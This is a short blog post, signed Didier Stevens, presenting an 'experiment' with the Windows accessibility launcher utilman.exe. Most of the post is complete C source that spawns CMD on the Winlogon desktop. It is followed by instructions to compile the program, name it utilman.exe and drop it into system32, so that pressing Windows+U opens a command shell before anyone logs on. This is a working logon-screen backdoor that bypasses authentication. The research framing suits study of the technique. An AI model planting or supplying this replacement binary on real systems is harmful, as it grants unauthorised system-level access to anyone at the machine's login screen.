Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:
You can compile the following example with Borland’s free C++ 5.5 compiler.
Fourth experiment
Compile this simple C program, name it utilman.exe and put it in the system32 directory:
#include <stdio.h>
#include <windows.h>
#include <tchar.h>
void _tmain(void)
{
STARTUPINFO s;
PROCESS_INFORMATION p;
LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\\\Winlogon"));
ZeroMemory(&s, sizeof(s));
s.cb = sizeof(s);
s.lpDesktop = szDesktop;
ZeroMemory(&p, sizeof(p));
CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p);
CloseHandle(p.hProcess);
CloseHandle(p.hThread);
}
Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.
Didier Stevens 